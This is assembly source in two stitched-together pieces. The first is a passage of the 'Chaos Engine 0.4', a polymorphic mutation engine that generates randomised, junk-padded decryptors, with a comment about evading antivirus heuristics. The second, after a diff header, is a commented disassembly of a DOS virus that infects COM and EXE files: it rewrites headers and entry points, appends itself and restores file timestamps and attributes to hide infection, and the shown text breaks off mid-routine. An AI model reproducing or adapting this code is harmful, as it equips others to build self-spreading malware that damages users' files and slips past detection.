length_1 equ (offset int_tbl - offset one_byters)-1
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;REGISTER TABLE - INTEL STANDLE FORMAT
tce_AX equ 0000xB
tce_CX equ 0001xB
tce_DX equ 0010xB
tce_BX equ 0011xB
tce_SP equ 0100xB
tce_BP equ 0101xB
tce_SI equ 0110xB
tce_DI equ 0111xB
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;THe BeLoW InSTuCTiOn CaN KilL A MaN
db '[TCE-0.4]',0
;*****************************************************
;*****************************************************
;*** The REAL _REAL_ START of THE CHAOS ENGINE 0.4 ***
;*****************************************************
;*****************************************************
tce: push ax,bx,bp
push di,si
cld
mov tce_begin,di
mov tce_delta,dx
mov c_length,cx
mov tce_flags,ax
call clear_regs
mov B index_sub,0
mov B[offset more_junk],0b0
test W tce_flags,MAKE_SMALL
if nz mov B[offset more_junk],0c3
push si
call get_rand_1f
add ax,MAX_PADDING
xchg cx,ax
call more_junk
swap0: mov si,offset init_1
lodsw
call binary
jz no_swap1
xchg ax,[si]
mov [si-2],ax
no_swap1:
push ax
lodsw
call binary
jnz no_swap2
xchg ax,[si]
mov [si-2],ax
no_swap2:
push ax
lodsw
lodsw
call binary
jz build_code
xchg ax,[si]
mov [si-2],ax
build_code:
pop ax
call ax
call pad_10
pop ax
call ax
call pad_10
call W init_3
call pad_10
call gen_decrypt
call pad_8
call W init_4
call pad_8
call W init_5
call pad_10
call gen_loop
call pad_8
test W tce_flags,PAD_TO_MAX
jz no_padding
mov B[offset more_junk],0b0
mov cx,DECRYPTOR_LENGTH
add cx,tce_begin
sub cx,di
call more_junk
no_padding:
mov ax,di
sub ax,DECRYPTOR_LENGTH
add enc_index,ax
mov bx,W index_loc
cmp B index_sub,1
if e neg ax
add es:[bx],ax
pop si
mov cx,c_length
rep movsb
mov dx,tce_begin
mov ds,es
call encryptor
mov cx,di
sub cx,dx
pop si,di
pop bp,bx,ax
ret
init_count: ;Initialises Count Register..
call get_unused_reg ;Make Count Initialiser in Encryptor and
cmp al,tce_DX
je init_count
mov count_reg,al ;Decryptor
mov bx,W c_length
shr bx,1
mov W enc_length,bx
call gen_mov_reg
ret
init_index: ;Initialises Index Register..
mov ax,0ff ;Makes Index Initialiser in Encryptor and
call get_rand ;Decryptor..
push ax
call get_rand_7
pop ax
if z xor ax,ax
mov B index_off,al
mov bx,DECRYPTOR_LENGTH
add bx, tce_begin
mov W enc_index,bx
add bx, tce_delta
cbw
sub bx,ax
get_index:
call get_unused_reg
cmp al,tce_BX
jb get_index
mov W index_num,ax
mov B index_reg,al
mov B index_set,1
call gen_mov_reg
mov B index_set,0
ret
gen_decrypt: ;generates DECRYPTOR / ENCRYPTOR instruction
mov W loop_start,di
call pad_8
mov bl,B key_reg
sal bl,3
call get_rand_2
add ax,ax
add ax,offset enc_table
xchg si,ax
lodsw
call binary
if z xchg ah,al
push ax
cmp si,offset enc_table + 2
jne no_carry_set
mov al,0f8
call binary
if z inc ax
mov B enc_cf,al
stosb
no_carry_set:
test W tce_flags,ADD_SEG
jz no_seg_set
mov al,2e
stosb
no_seg_set:
pop ax
stosb
mov B enc_loop,ah
mov si,W index_num
cmp B index_reg,tce_BP
je encryptor_has_offset
cmp B index_off,0
jne encryptor_has_offset
push ax
call get_rand_7
pop ax
jz encryptor_has_offset
add si,index_tab_c
lodsb
or al,bl
stosb
ret
encryptor_has_offset:
add si,index_tab_b
lodsb
or al,bl
mov ah,B index_off
or al,bl
stosw
xchg al,ah
cbw
call binary
jnz ret
mov al,ah
stosb
add es:B[di-3],40
ret
modify_key: ;Modify Key: XOR/ADD/SUB key_reg,xxxx
call get_rand_7
jz no_mod_key
call get_rand_2
add ax,offset modify_table
xchg si,ax
lodsb
mov ah,al
mov al,81
mov W enc_mod_op,ax
or ah,B key_reg
stosw
call get_any_rand
stosw
no_mod_key:
mov W enc_mod_val,ax
ret
inc_index: ;increase index by 2..
call binary ;1 in 2 chance of ADD reg,2/SUB reg,-2
jz add_sub_index
mov al,B index_reg
or al,40
stosb
call pad_8
stosb
ret
add_sub_index:
mov al,83
stosb
mov ah,2
mov al,B index_reg
or al,0c0
call binary
jnz put_add_sub_index
neg ah
or al,0e8
put_add_sub_index:
stosw
ret
gen_loop:
mov al,B count_reg
cmp al,tce_CX
jne not_CX
push ax
call get_rand_7
pop ax
jz not_CX
lea bx,[di+2]
mov ax,W loop_start
sub ax,bx
mov ah,0e2
call binary
jnz no_loop_nz
xchg bp,ax
jmp short do_loop_nz
no_loop_nz:
xchg ah,al
stosw
ret
not_CX: xchg bx,ax
call binary
jz count_add_sub
mov al,48
or al,bl
stosb
jmp short zero_test
count_add_sub:
mov al,83
stosb
mov ah,-1
mov al,bl
or al,0c0
call binary
jnz put_add_sub_count
neg ah
or al,0e8
put_add_sub_count:
stosw
xor bp,bp
push ax
call get_rand_7
pop ax
jz nloop_nz
zero_test:
call pad_10
xor bp,bp
do_loop_nz:
mov al,B count_reg
mov bl,al
sal al,3
or al,bl
xchg ah,al
mov bh,ah
call get_rand_2
add ax,offset zero_test_a
xchg si,ax
lodsb
mov ah,bh
or ah,0c0
stosw
nloop_nz:
lea bx,[di+2]
mov ax,W loop_start
sub ax,bx
or bp,bp
jnz loop_nz
mov ah,075
call binary
jnz nnnn
mov B es:[di],0f8
inc di
sub ax,0fe01
db 0a9
loop_nz:mov ah,0e0
nnnn: xchg ah,al
stosw
ret
init_key:
call get_any_rand
mov W enc_key,ax
xchg bx,ax
call get_unused_reg
mov B key_reg,al
gen_mov_reg:
call binary
jz lea_mov
or al,0b8
stosb
xchg ax,bx
jmp short put_mov_b
lea_mov:call binary
jz zero_then_add
sal al,3
or al,06
mov ah,8d
xchg ah,al
stosw
xchg ax,bx
jmp short put_mov_b
zero_then_add: ;Zero Register (XOR/SUB reg,reg)
push bx ;Then OR/XOR/ADD Value
push ax ;or SUB -Value
mov ah,0c0
or ah,al
sal al,3
or ah,al
mov al,29
call binary
if z mov al,31
stosw
call pad_10
pop bx
call get_rand_2
add ax,offset value_from_0
xchg si,ax
lodsb
call binary
jz zero_then_sub
or al,bl
mov ah,81
xchg ah,al
stosw
pop ax
put_mov_b:
cmp B index_set,01
if e mov W index_loc,di
stosw
ret
zero_then_sub:
cmp B index_set,01
if e mov B index_sub,1
mov al,0e8
or al,bl
mov ah,81
xchg ah,al
stosw
pop ax
neg ax
jmp short put_mov_b
pad_8: push ax ;Sub Procedure to Pad Between 1 and 8 bytes
call get_rand_7
inc ax
jmp short padder
pad_10: push ax
call get_rand_1f ;Sub Procedure to Pad Between 8 and 16 bytes
or al,8
padder: xchg cx,ax
call more_junk
pop ax
ret
more_junk:
mov al,03
call get_rand_b
jnz mj0
mov B [offset code_jmp],083 ;Re-Enable Jumps
mov ax,cx ;else normal filler junk (1 in 16)
cmp ax,40
if a mov al,40
call get_rand_b
xchg bx,ax
call fill_jnk
jmp short mj2
mj0: ;8 in 16 chance of some type of jump
call code_jmp
mj2: jcxz ret
jmp short more_junk
one_byte: ;GENERATES A ONE BYTE JUNK INSTRUCTION
jcxz ret
mov si,one_byters ;FROM one_byters TABLE
mov al,length_1
call get_rand_b
add si,ax
movsb
dec cx
dec bx
ret
reg_op: call get_rand_7 ;ANY OP unused_reg16,reg16..
sal al,3
or al,3
xchg dx,ax
call get_unused_reg
sal al,3
mov dh,al
call get_rand_7
do_op: or dh,al
or dh,0c0
xchg dx,ax
put_2: cmp bx,2
jb one_byte
stosw
dec cx,2
dec bx,2
ret
lea_reg:call get_rand_7 ;LEA unused_reg,[BP/BX/SI/DI]
cmp al,6
je lea_reg
xchg dx,ax
call get_unused_reg
sal al,3
or al,dl
mov ah,08d
xchg ah,al
jmp short put_2
op_ax: call get_any_rand
and al,8
or al,5
and ah,3
shr ah,4
or al,ah
put_3: cmp bx,3
jb reg_op
stosb
call get_any_rand
put_3b: stosw
sub cx,3
sub bx,3
ret
mov_reg:call get_unused_reg ;MOV unused_reg16,xxxx
or al,0b8
jmp short put_3
op_reg_im: ;cmp/add/sub/adc/sbb/or/xor/and reg16,imm16
cmp bx,4
jb op_ax
call get_unused_reg
mov ah,81
xchg dx,ax
call get_rand_7
sal al,3
or ax,dx
xchg ah,al
or ah,0c0
stosw
call get_any_rand
stosw
sub bx,4
sub cx,4
ret
code_jmp:
cmp cx,3
jb ret
mov B [offset code_jmp],0c3 ;Disable Jumps.This ensures Unchained
;(TBAV-J) and helps stops heuristics
call get_any_rand ;else conditional jmp
and ax,1f0f ;between 4 and 43 bytse jmp length
add ah,4
or al,70 ;conditional jmp instructions are 70
;--> 7f
push ax
call get_rand_1f
pop ax
if z mov al,0e3
xor bx,bx
mov bl,ah
dec cx,2
cmp bx,cx
jb put_jmp
mov bx,cx
mov ah,bl
put_jmp:stosw
fill_jnk:
or bx,bx
jz ret
mov al,((offset binary - offset junk_tbl)/2)-1
call get_rand_b
add ax,ax
add ax,offset junk_tbl
xchg si,ax
lodsw
call ax
jmp short fill_jnk
pp_reg: ;generate PUSH reg / junk / POP reg
cmp bx,3
jb gen_int
lea ax,[bx-2]
shr ax,1
call get_rand
xchg ax,dx
call get_rand_7
or al,50
stosb
dec cx
dec bx
push ax
xchg dx,ax
sub bx,ax
push bx
xchg bx,ax
call fill_jnk
pop bx
pop ax
call binary
jz use_same
call get_unused_reg
or al,50
use_same:
or al,8
stosb
dec cx
dec bx
ret
gen_int:cmp bx,4
jb ret
call get_rand_2
add ax,ax
add ax,offset int_tbl
xchg si,ax
lodsw
mov dx,0cdb4
xchg al,dl
stosw
xchg dx,ax
xchg ah,al
stosw
sub cx,4
sub bx,4
ret
junk_tbl: dw offset op_reg_im
dw offset op_reg_im
dw offset op_reg_im
dw offset gen_int
dw offset gen_int
dw offset pp_reg
dw offset pp_reg
dw offset reg_op
dw offset reg_op
dw offset lea_reg
dw offset lea_reg
dw offset mov_reg
dw offset op_ax
dw offset one_byte
binary: push ax
mov al,1
call get_rand_b
pop ax
ret
get_rand_2:
mov al,2
db 0a9
get_rand_7:
mov al,7
db 0a9
get_rand_1f:
mov al,1f
db 0a9
get_any_rand: ;return rnd number in AX between 0 and FFFE
mov al,0fe
get_rand_b:
cbw
get_rand: ;returns random number in AX between 0 and AX
push cx,dx
inc ax
push ax
in ax,40
xchg cx,ax
in ax,40
rol ax,cl
xchg cx,ax
in ax,40
xor ax,cx
adc ax,1234
org $-2
last_rand dw 0AAAA
mov last_rand,ax
pop cx
xor dx,dx
cmp cx,1
adc cx,0
div cx
xchg dx,ax
or ax,ax
pop dx,cx
ret
one_byters: cmc ;15 1 byte junk instructions
cld
std
in ax,dx
in al,dx
lahf
cbw
nop
aaa
aas
daa
das
inc ax
dec ax
xlat
int_tbl: dw 0116 ;AH=01,INT16: Check Keyboard Buffer..
dw 0216 ;AH=02,INT16: Get Keyboard States..
dw 4d21 ;AH=4D,INT21: Get Program Terminate Status..
dw 4d21 ;AH=4D,INT21: Get Program Terminate Status..
dw 0d10 ;AH=0D,INT10: Get Video Info..
dw 0b21 ;AH=0B,INT21: Check Keyboard Buffer..
dw 002a
dw 002a
clear_regs: cwd
mov B index_reg,dl ;Clears Register Tables
mov B key_reg,dl ;(All Regs Free)..
mov B count_reg,dl
ret
get_unused_reg: call get_rand_7 ;Return an Unused Register..
test al,NOT tce_SP ;But _NOT_ SP, or AX.
jz get_unused_reg
cmp al,index_reg
je get_unused_reg
cmp al,count_reg
je get_unused_reg
cmp al,B key_reg
je get_unused_reg
ret
;**********************************************
;* The Encryptor (Built along with Decryptor) *
;**********************************************
encryptor: mov cx,1234
org $-2
enc_length dw 0
mov bx,1234
org $-2
enc_index dw 0
mov ax,1234
org $-2
enc_key dw 0
enc_cf: nop
enc_loop: xor [bx],ax
enc_mod_op dw 0
enc_mod_val dw 0
inc bx,2
loop enc_cf
ret
;****************************
;* Data / Variables / Flags *
;****************************
init_1 dw offset init_count
init_2 dw offset init_key
init_3 dw offset init_index
init_4 dw offset inc_index
init_5 dw offset modify_key
;* The Below is A table of Values to Be Used To Choose *
;* The Count Register, The Index Register, and The Reg *
;* to save SP in During the Decryptor Loop *
; BX BP SI DI ;This Table is used To Build
index_tab_b: db 0,0,0,47,0,46,44,45 ;The Decryptor Instruction
index_tab_c: db 0,0,0,7,0,0,4,5 ;Same As Above
; SBB ADC XOR XOR ADD SUB
enc_table: db 19, 11, 31, 31, 01, 29 ;The Decryptor Opcodes..
; AND OR TEST
zero_test_a: db 21, 09,85
; SUB ;Opcodes to Modify the Key
modify_table: db 0e8 ;Register
; ADD XOR OR ;Opcode to get A value
value_from_0: db 0c0,0f0,0c8 ;from 0.
loop_start dw 0 ;Postion for LOOP to Jump to..
index_num dw 0
index_off db 0 ;OFFSET of INDEX reference (i.e: [SI+XX]).
index_loc dw 0 ;location in ES of index reference set
index_sub db 0 ;Was index_reg set using 0 the sub -value?
index_reg db 0 ;Table of Used Registers..
count_reg db 0 ;used in GET_UNUSED_REG
key_reg db 0
index_set db 0
tce_flags dw 0 ;Engines Flags
tce_delta dw 0 ;Delta Offset
tce_begin dw 0 ;Beginning
c_length dw 0
end_tce:

@ -0,0 +1,826 @@
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
start: mov ax,es ;0100 8C C0
add word ptr cs:[d_010C+2],ax ;segment relocation ;0102 2E: 01 06 010E
jmp dword ptr cs:[d_010C] ;jump into virus code ;0107 2E: FF 2E 010C
d_010C dw 0000,0138h ;dword=entry into virus ;010C 0000 0138
;<- duplicated code (aligning to 20h bytes)
db 0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h ;0110 B8 08 00 8E C0 8B 0E 41
db 003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh ;0118 03 BA 28 00 2E 8B 1E 9B
;..............................................................
; victim code
;..............................................................
org 1380h
;============================================================================
; Segment aligned virus segment begin
;----------------------------------------------------------------------------
;================================================================
; COM virus Entry
; (this code is present only in case *.COM infection)
;----------------------------------------------------------------
l_0000: push ds ;1380 1E
push cs ;1381 0E
pop ds ;1382 1F
lea si,cs:[4F7h] ;d_1877 = saved bytes ;1383 8D 36 04F7
mov di,100h ;1387.BF 0100
mov cx,20h ;138A B9 0020
rep movsb ;restore victim bytes ;138D F3/ A4
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;138F 2E: C6 06 0349 FF
nop ;1395 90
pop ds ;1396 1F
lea ax,cs:[54Fh] ;l_18CF ;1397 8D 06 054F
jmp ax ;139B FF E0
;<--- duplicated fields d_033F - d_0347
dw 0020 ;139D 20 00
dw 05EAh ;139F EA 05
dw 0Bh ;13A1 0B 00
dw 28h ;13A3 28 00
dw 200h ;13A5 00 02
db 0 ;13A7 00
;===========================================================================
; Begin of file type independent virus code
;---------------------------------------------------------------------------
;================================================================
; Get/Set victim attribute
;----------------------------------------------------------------
s_13A8 proc near
mov dx,offset ds:[57Fh] ;file name ;13A8.BA 057F
mov ah,43h ;get/set file attrb ;13AB B4 43
int 21h ;13AD CD 21
retn ;13AF C3
s_13A8 endp
;================================================================
; Move file ptr to EOF
;----------------------------------------------------------------
s_13B0 proc near
xor cx,cx ;13B0 33 C9
xor dx,dx ;13B2 33 D2
mov ax,4202h ;move file ptr EOF+offset ;13B4 B8 4202
mov bx,cs:[9Bh] ;l_141B = file handle ;13B7 2E: 8B 1E 009B
int 21h ;13BC CD 21
retn ;13BE C3
s_13B0 endp
;================================================================
; Read 32 bytes into buffer
;----------------------------------------------------------------
s_13BF proc near
mov cx,20h ;13BF B9 0020
mov dx,4F7h ;l_1877-sav victim bytes;13C2.BA 04F7
mov bx,cs:[9Bh] ;l_141B = file handle ;13C5 2E: 8B 1E 009B
mov ah,3Fh ;read file ;13CA B4 3F
int 21h ;13CC CD 21
mov cx,ax ;bytes read ;13CE 8B C8
retn ;13D0 C3
s_13BF endp
;================================================================
; Write 32 B into file
;----------------------------------------------------------------
s_13D1 proc near
mov ax,8 ;switch off destruction ;13D1 B8 0008
mov es,ax ;13D4 8E C0
mov cx,20h ;13D6 B9 0020
mov dx,offset ds:[4F7h] ;l_1877 - saved bytes ;13D9.BA 04F7
mov bx,cs:[9Bh] ;l_141B = file handle ;13DC 2E: 8B 1E 009B
mov ah,40h ;write file cx=bytes ;13E1 B4 40
int 21h ;13E3 CD 21
mov cx,ax ;13E5 8B C8
retn ;13E7 C3
s_13D1 endp
;================================================================
; Calculate virus length
;----------------------------------------------------------------
s_13E8 proc near
mov ax,612h ;virus code length ;13E8 B8 0612
mov dx,28h ;file type depended code;13EB BA 0028
sub ax,dx ;13EE 2B C2
mov ds:[341h],ax ;l_16C1 const vcode len ;13F0 A3 0341
retn ;13F3 C3
s_13E8 endp
;================================================================
; Get/Set file daye & time
;----------------------------------------------------------------
s_13F4 proc near
mov bx,ds:[9Bh] ;l_141B = file handle ;13F4 8B 1E 009B
mov ah,57h ;get/set file date & time ;13F8 B4 57
int 21h ;13FA CD 21
retn ;13FC C3
s_13F4 endp
;================================================================
; Contamine File - master routine
;----------------------------------------------------------------
s_13FD proc near
mov byte ptr ds:[349h],0 ;d_16C9 (000h = EXE) ;13FD C6 06 0349 00
nop ;1402 90
mov al,0 ;1403 B0 00
call s_13A8 ;Get victim attribute ;1405 E8 FFA0
jc l_146A ;-> EXIT ;1408 72 60
mov ds:[33Fh],cx ;l_16BF oryg. file attr ;140A 89 0E 033F
mov cx,20h ;140E B9 0020
mov al,1 ;1411 B0 01
call s_13A8 ;Set victim attribute ;1413 E8 FF92
jc l_146A ;-> EXIT ;1416 72 52
jmp short l_1421 ;1418 EB 07
nop ;141A 90
d_009B dw 0005h ;file handle ;141B 05 00
d_009D dw 0400h ;141D 00 04
d_009F dw 057Fh ;filepath address ;141F 7F 05
l_1421: mov word ptr cs:[9Fh],057Fh ;l_141F := offset l_18FF;1421 2E C7 06 9F 00 7F 05
mov dx,ds:[9Fh] ;l_141F - file name ;1428 8B 16 009F
mov ax,400h ;142C B8 0400
mov ds:[9Dh],ax ;l_141D ;142F A3 009D
mov al,2 ;1432 B0 02
mov ah,3Dh ;open file, al=mode ;1434 B4 3D
int 21h ;1436 CD 21
mov word ptr ds:[9Bh],0FFFFh ;l_141B = file handle ;1438 C7 06 009B FFFF
jc l_1443 ;143E 72 03
mov ds:[9Bh],ax ;l_141B = file handle ;1440 A3 009B
l_1443: mov ax,ds:[9Bh] ;l_141B = file handle ;1443 A1 009B
cmp ax,0FFFFh ;1446 3D FFFF
je l_146A ;-> EXIT, open file err ;1449 74 1F
mov al,0 ;144B B0 00
call s_13F4 ;Get file daye & time ;144D E8 FFA4
jc l_148F ;-> err, close & exit ;1450 72 3D
mov ds:[0E8h],dx ;l_1468 = date ;1452 89 16 00E8
mov ds:[0EDh],cx ;l_146D = time ;1456 89 0E 00ED
call s_13BF ;Read 32 B into buffer ;145A E8 FF62
mov ax,word ptr ds:[4F7h] ;l_1877 first file word ;145D A1 04F7
cmp ax,5A4Dh ;'MZ' ? ;1460 3D 5A4D
je l_146F ;-> yes, EXE ;1463 74 0A
jmp l_1616 ;-> no, COM ;1465 E9 01AE
d_00E8 dw 0EF8h ;victim date ;1468 F8 0E
l_146A: jmp l_15C6 ;146A E9 0159
d_00ED dw 0001h ;victim time ;146D 01 00
;================================================================
; EXE file contamination
;----------------------------------------------------------------
l_146F: mov ax,word ptr ds:[509h] ;+12h = negative sum ;146F A1 0509
neg ax ;1472 F7 D8
cmp ax,word ptr ds:[4F9h] ;+2 = last page bytes ;1474 3B 06 04F9
je l_148F ;-> allready infected ;1478 74 15
mov ax,word ptr ds:[4FBh] ;+4 = pages in file ;147A A1 04FB
cmp ax,3 ;147D 3D 0003
jb l_148F ;-> file to small ;1480 72 0D
mov ax,word ptr ds:[4FFh] ;+8 = size of hdr (para);1482 A1 04FF
mov cl,4 ;1485 B1 04
shl ax,cl ;1487 D3 E0
mov ds:[347h],ax ;l_16C7 = size of header;1489 A3 0347
jmp short l_1492 ;148C EB 04
nop ;148E 90
l_148F: jmp l_15A8 ;148F E9 0116
l_1492: mov ax,word ptr ds:[50Bh] ;+14h = IP ;1492 A1 050B
mov word ptr ds:[5B4h],ax ;l_1934 ;1495 A3 05B4
mov word ptr ds:[50Bh],28h ;new IP value (l_13A8) ;1498 C7 06 050B 0028
call s_13B0 ;Move file ptr to EOF ;149E E8 FF0F
push ax ;14A1 50
push dx ;14A2 52
sub ax,ds:[347h] ;l_16C7=size of header ;14A3 2B 06 0347
sbb dx,0 ;14A7 83 DA 00
mov word ptr ds:[439h],ax ;l_17B9 ;14AA A3 0439
mov word ptr ds:[437h],dx ;l_17B7 ;14AD 89 16 0437
cmp dx,0 ;14B1 83 FA 00
ja l_14D3 ;-> more then 64KB ;14B4 77 1D
cmp ax,word ptr ds:[50Bh] ;+14h = IP ;14B6 3B 06 050B
ja l_14D3 ;-> more then 28h length;14BA 77 17
;<- EXE code length =< 28h
mov word ptr ds:[345h],0 ;l_16C5 ;14BC C7 06 0345 0000
mov bx,word ptr ds:[50Bh] ;14C2 8B 1E 050B
sub bx,ax ;28h - file length ;14C6 2B D8
mov ds:[343h],bx ;l_16C3 - aligning bytes;14C8 89 1E 0343
mov ds:[513h],bx ;+1Ch = ? ;14CC 89 1E 0513
jmp short l_1511 ;14D0 EB 3F
nop ;14D2 90
l_14D3: sub ax,word ptr ds:[50Bh] ;+14h = IP=28h ;14D3 2B 06 050B
sbb dx,0 ;14D7 83 DA 00
mov ds:[345h],ax ;d_16C5 ;14DA A3 0345
and ax,0Fh ;14DD 25 000F
cmp ax,0 ;14E0 3D 0000
jne l_14F9 ;-> need aligment ;14E3 75 14
mov word ptr ds:[343h],0 ;d_16C3 - aligning bytes;14E5 C7 06 0343 0000
mov ax,ds:[345h] ;d_16C5 ;14EB A1 0345
mov cx,10h ;14EE B9 0010
div cx ;14F1 F7 F1
mov ds:[345h],ax ;d_16C5 - segment of vir;14F3 A3 0345
jmp short l_1511 ;14F6 EB 19
db 90h ;14F8 90
;<---- need alignment
l_14F9: mov word ptr ds:[343h],10h ;d_16C3 - aligning bytes;14F9 C7 06 0343 0010
sub ds:[343h],ax ;d_16C3 - aligning bytes;14FF 29 06 0343
mov ax,ds:[345h] ;d_16C5 ;1503 A1 0345
mov cx,10h ;1506 B9 0010
div cx ;1509 F7 F1
add ax,1 ;+ alignment paragraph ;150B 05 0001
mov ds:[345h],ax ;d_16C5 - segment of vir;150E A3 0345
l_1511: mov ax,word ptr ds:[50Dh] ;+ 16h = CS ;1511 A1 050D
mov word ptr ds:[5B6h],ax ;d_1936 - victim CS ;1514 A3 05B6
mov ax,ds:[345h] ;d_16C5 ;1517 A1 0345
mov word ptr ds:[50Dh],ax ;+ 16h = CS ;151A A3 050D
push ax ;151D 50
mov ax,word ptr ds:[505h] ;+ 0Eh = SS ;151E A1 0505
mov word ptr ds:[5A1h],ax ;d_1921 - victim SS ;1521 A3 05A1
pop ax ;1524 58
mov word ptr ds:[505h],ax ;+ 0Eh = virus SS ;1525 A3 0505
mov ax,word ptr ds:[507h] ;+ 10h = SP ;1528 A1 0507
mov word ptr ds:[5A3h],ax ;d_1923 victim SP ;152B A3 05A3
lea ax,cs:[612h] ;End of virus ;152E 8D 06 0612
add ax,1Eh ;virus stack ;1532 05 001E
add ax,ds:[343h] ;d_16C3 - aligning bytes;1535 03 06 0343
mov word ptr ds:[507h],ax ;virus SP ;1539 A3 0507
call s_13E8 ;Calculate virus length ;153C E8 FEA9
pop dx ;<- victim EOF ;153F 5A
pop ax ;1540 58
add ax,ds:[341h] ;l_16C1 const vcode len ;1541 03 06 0341
adc dx,0 ;1545 83 D2 00
add ax,ds:[343h] ;d_16C3 - aligning bytes;1548 03 06 0343
adc dx,0 ;154C 83 D2 00
mov cx,200h ;page length ;154F B9 0200
div cx ;1552 F7 F1
cmp dx,0 ;1554 83 FA 00
je l_155A ;1557 74 01
inc ax ;1559 40
l_155A: mov word ptr ds:[4FBh],ax ;+4 - file len in pages ;155A A3 04FB
mov word ptr ds:[4F9h],dx ;+2 - last page length ;155D 89 16 04F9
neg dx ;1561 F7 DA
mov word ptr ds:[509h],dx ;+12h = negative sum ;1563 89 16 0509
mov cx,54Fh ;offset l_18CF-EXE entry;1567 B9 054F
mov word ptr ds:[50Bh],cx ;+14h - virus IP ;156A 89 0E 050B
cmp word ptr ds:[343h],3 ;d_16C3 - aligning bytes;156E 83 3E 0343 03
jb l_1580 ;1573 72 0B
;<- file begins with jump
mov cx,28h ;1575 B9 0028
sub cx,ds:[343h] ;d_16C3 - aligning bytes;1578 2B 0E 0343
mov word ptr ds:[50Bh],cx ;157C 89 0E 050B
l_1580: call s_15DF ;Set file pointer to BOF;1580 E8 005C
call s_13D1 ;Write 32 B into file ;1583 E8 FE4B
jc l_15A8 ;-> error, EXIT ;1586 72 20
mov cx,ds:[343h] ;d_16C3 - aligning bytes;1588 8B 0E 0343
sub cx,3 ;jmp instruction length ;158C 83 E9 03
mov ax,54Fh ;offset l_18CF=EXE entry;158F B8 054F
mov bx,28h ;beginning of code ;1592 BB 0028
sub ax,bx ;jmp distance ;1595 2B C3
add cx,ax ;aligning bytes ;1597 03 C8
mov word ptr ds:[54Ch],cx ;l_18CC = jump distance ;1599 89 0E 054C
call s_13B0 ;Move file ptr to EOF ;159D E8 FE10
call s_15C7 ;Align EOF to paragraphs;15A0 E8 0024
jc l_15A8 ;-> error, EXIT ;15A3 72 03
call s_15FE ;Write const part of vir;15A5 E8 0056
;================================================================
; End of contamination (common to EXE & COM)
;----------------------------------------------------------------
l_15A8: mov al,1 ;to set ;15A8 B0 01
mov dx,ds:ds:[0E8h] ;d_1468 victim date ;15AA 8B 16 00E8
mov cx,ds:ds:[0EDh] ;d_146D victim time ;15AE 8B 0E 00ED
call s_13F4 ;Set file daye & time ;15B2 E8 FE3F
mov bx,ds:[9Bh] ;l_141B = file handle ;15B5 8B 1E 009B
mov ah,3Eh ;close file ;15B9 B4 3E
int 21h ;15BB CD 21
mov al,1 ;to set ;15BD B0 01
mov cx,ds:[33Fh] ;l_16BF oryg. file attr ;15BF 8B 0E 033F
call s_13A8 ;Set victim attribute ;15C3 E8 FDE2
l_15C6: retn ;15C6 C3
;================================================================
; Align end of file to paragraphs
;----------------------------------------------------------------
s_15C7: mov ax,8 ;to switch off virus ;15C7 B8 0008
mov es,ax ;15CA 8E C0
mov cx,ds:[343h] ;l_16C3 - aligning bytes;15CC 8B 0E 0343
mov dx,54Bh ;offset d_18CB ;15D0.BA 054B
mov bx,cs:[9Bh] ;l_141B = file handle ;15D3 2E: 8B 1E 009B
mov ah,40h ;write file ;15D8 B4 40
int 21h ;15DA CD 21
mov cx,ax ;15DC 8B C8
retn ;15DE C3
;================================================================
; Set file pointer to BOF
;----------------------------------------------------------------
s_15DF: xor cx,cx ;15DF 33 C9
xor dx,dx ;15E1 33 D2
mov ax,4200h ;move file ptr, cx,dx=offset ;15E3 B8 4200
mov bx,cs:[9Bh] ;l_141B = file handle ;15E6 2E: 8B 1E 009B
int 21h ;15EB CD 21
retn ;15ED C3
;================================================================
; COM virus start code pattern
;----------------------------------------------------------------
d_026E: mov ax,es ;15EE 8C C0
add word ptr cs:[010Ch+2],ax ;15F0 2E: 01 06 010E
jmp dword ptr cs:[010Ch] ;15F5 2E: FF 2E 010C
d_027A dw 0 ;15FA 00 00
d_027C dw 0138h ;15FC 38 01
;================================================================
; Write constant part of virus
;----------------------------------------------------------------
s_15FE: mov ax,8 ;switch off virus ;15FE B8 0008
mov es,ax ;1601 8E C0
mov cx,ds:[341h] ;l_16C1 const.code leng.;1603 8B 0E 0341
mov dx,28h ;offset l_13A8 - vircode;1607.BA 0028
mov bx,cs:[9Bh] ;l_141B = file handle ;160A 2E: 8B 1E 009B
mov ah,40h ;write file ;160F B4 40
int 21h ;1611 CD 21
mov cx,ax ;1613 8B C8
retn ;1615 C3
;================================================================
; COM victim contamination
;----------------------------------------------------------------
l_1616: cmp word ptr ds:[4F9h],12Eh ;BOF+2 ;1616 81 3E 04F9 012E
je l_15A8 ;-> contamined, EXIT ;161C 74 8A
call s_13B0 ;Move file ptr to EOF ;161E E8 FD8F
cmp ax,3E8h ;1000 byte file length ;1621 3D 03E8
jb l_169F ;-> bellow, EXIT ;1624 72 79
add ax,100h ;add PSP ;1626 05 0100
adc dx,0 ;1629 83 D2 00
push ax ;162C 50
and ax,0Fh ;162D 25 000F
mov word ptr ds:[343h],0 ;l_16C3 aligning bytes ;1630 C7 06 0343 0000
cmp ax,0 ;1636 3D 0000
je l_1645 ;-> para aligned file ;1639 74 0A
mov word ptr ds:[343h],10h ;l_16C3 - aligning bytes;163B C7 06 0343 0010
sub ds:[343h],ax ;l_16C3 - aligning bytes;1641 29 06 0343
l_1645: pop ax ;1645 58
add ax,ds:[343h] ;l_16C3 aligning bytes ;1646 03 06 0343
adc dx,0 ;164A 83 D2 00
cmp dx,0 ;164D 83 FA 00
ja l_169F ;-> file to big, EXIT ;1650 77 4D
mov cl,4 ;1652 B1 04
shr ax,cl ;bytes 2 paragraphs ;1654 D3 E8
cmp word ptr ds:[343h],0 ;l_16C3 - aligning bytes;1656 83 3E 0343 00
mov ds:[27Ch],ax ;l_15FC virus segment ;165B A3 027C
mov word ptr ds:[27Ah],0 ;l_15FA virus entry ;165E C7 06 027A 0000
call s_15DF ;Set file pointer to BOF;1664 E8 FF78
mov ax,8 ;to switch off virus ;1667 B8 0008
mov es,ax ;166A 8E C0
mov cx,20h ;bytes to write ;166C B9 0020
mov dx,26Eh ;offset l_15EE ;166F.BA 026E
mov bx,cs:[9Bh] ;l_141B = file handle ;1672 2E: 8B 1E 009B
mov ah,40h ;write file ;1677 B4 40
